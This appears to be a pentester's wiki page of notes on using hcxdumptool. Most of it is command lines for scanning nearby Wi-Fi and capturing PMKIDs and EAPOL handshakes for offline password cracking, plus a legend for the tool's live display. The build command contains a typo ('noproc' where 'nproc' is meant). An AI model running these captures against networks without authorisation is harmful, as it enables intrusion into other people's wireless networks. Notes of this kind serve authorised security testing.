# hcxdumptool

This [tool](https://github.com/ZerBea/hcxdumptool/) is awesome for wifi shenanigans.
:::info
For now I'm just dumping notes I gathered from a recent engagement where I needed to use this tool to capture/extract/crack PMKIDs.
:::

## Install

```
git clone https://github.com/ZerBea/hcxdumptool.git ~/hcxdumptool
cd ~/hcxdumptool
sudo apt install build-essential git libpcap-dev -y
make -j $(noproc)
```

## Enumerate nearby wifi
```
sudo hcxdumptool -i wlan0mon -F --rcascan=active
```

## Attack just specific channels
```
sudo hcxdumptool -i wlan0mon -F --rds=1 -c40b,44b -w dump.pcapng
```

## Basic run to start enumerating/attacking all the wifis
*Taking these tips from [this issue](https://github.com/ZerBea/hcxdumptool/issues/355).  [This Cyberark blog](https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick) was also very helpful.*

```
sudo hcxdumptool -i INTERFACENAME -w dumpfile.pcapng --rds=1 -F
```

:::tip
Don't put in monitor mode first!
:::

## Build a filter list
*Check out [this issue](https://github.com/ZerBea/hcxdumptool/issues/301#issuecomment-1594707335) for a good example.  Also check out [this discussion](https://github.com/ZerBea/hcxdumptool/discussions/485).*

## Capture away!

### Capture with BPF
```
hcxdumptool -i NAME-OF-PHYSICAL-WIFI-INTERFACE --bpf=attack.bpf -w output.pcapng --rds=1 -F
```

### Capture with BPF and specific channels
```
hcxdumptool -i NAME-OF-PHYSICAL-WIFI-INTERFACE --bpf=attack.bpf -w output.pcapng --rds=1 -F -c 55,23
```

As the scan runs you'll see a table with heading:

```
R 1 3 P S
```
- **R** - AP in range or under attack
- **1** - got EAPOL M1 challenge
- **3** - got EAPOL M1M2M3 or EAPOL (hashcat/JTR can work with this)
- **P** - got PMKID (hashcat/JTR can work with this)
- **S** - authentication key management PSK
:::tip

*Better explanation from [this thread](https://github.com/ZerBea/hcxdumptool/issues/301)*
```
real time display:
 R = + AP display:     AP is in TX range or under attack
 S = + AP display:     AUTHENTICATION KEY MANAGEMENT PSK
 P = + AP display:     got PMKID
 1 = + AP display:     got EAPOL M1 (CHALLENGE)
 3 = + AP display:     got EAPOL M1M2M3 (AUTHORIZATION)
 E = + CLIENT display: got EAP-START MESSAGE
 2 = + CLIENT display: got EAPOL M1M2 (ROGUE CHALLENGE)
 ```
:::

:::warning
WPA3 is attacked differently!  Check the [hcxlabtool](/pentesting/Wifi/hcxlabtool) page for more information.
:::